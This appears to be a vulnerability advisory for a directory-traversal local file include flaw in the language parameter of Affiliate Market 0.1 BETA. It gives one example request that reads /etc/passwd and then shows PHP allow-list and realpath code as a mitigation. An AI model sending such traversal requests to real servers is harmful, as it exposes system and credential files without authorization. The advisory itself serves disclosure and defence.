Vendor: Affiliate Market
By: milw0rm.com
CVSS: 7.5 (HIGH)
Local File Include
CWE: 22
Product Name: Affiliate Market
Affected Version From: Ver.0.1 BETA
Affected Version To: Ver.0.1 BETA
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Affiliate Market Ver.0.1 BETA (language) Local File Include Vulnerability
Affiliate Market Ver.0.1 BETA is vulnerable to a Local File Include vulnerability through the language parameter. It allows an attacker to include a file on the server that is readable by the web server. An attacker can exploit it by sending a specially crafted HTTP request containing directory traversal sequences (../). The vulnerable code is in the /user/header.php file. An example request is: /user/header.php?language=../../../../../../../../../../../etc/passwd
Mitigation:
The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before it is used in a file path. This prevents an attacker from using the language parameter to include arbitrary files from the web server.
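One way to apply this validation, as an added example that is not the product's own code: the language value is matched against a fixed allow-list, and the resolved path is checked to stay inside the language directory. The directory layout (lang/<name>.php), the language names and the function name resolve_language_file are assumptions.

```php
<?php
declare(strict_types=1);

// Requires PHP 8.0+ (mixed type, str_starts_with).
// Assumed layout: language files live in <app>/lang/<name>.php (hypothetical).
const LANG_DIR = __DIR__ . '/lang';
const ALLOWED_LANGUAGES = ['english', 'german', 'french']; // assumed names
const DEFAULT_LANGUAGE = 'english';

/**
 * Map an untrusted "language" value to a file path inside the language
 * directory. Returns null when no safe file can be resolved.
 */
function resolve_language_file(mixed $input, string $baseDir = LANG_DIR): ?string
{
    // Reject arrays (?language[]=x) and anything not on the allow-list.
    // Strict matching means "../", NUL bytes and URL schemes never pass.
    $lang = (is_string($input) && in_array($input, ALLOWED_LANGUAGES, true))
        ? $input
        : DEFAULT_LANGUAGE;

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // language directory missing
    }

    // Defence in depth: resolve symlinks and confirm the final path is
    // still inside the language directory before it is included.
    $path = realpath($base . DIRECTORY_SEPARATOR . $lang . '.php');
    if ($path === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$file = resolve_language_file($_GET['language'] ?? DEFAULT_LANGUAGE);
if ($file === null) {
    http_response_code(500);
    exit('Language file unavailable.');
}
require $file;
```

A request carrying traversal sequences in language falls back to the default language file, because the value never reaches the path unless it is an exact allow-list entry.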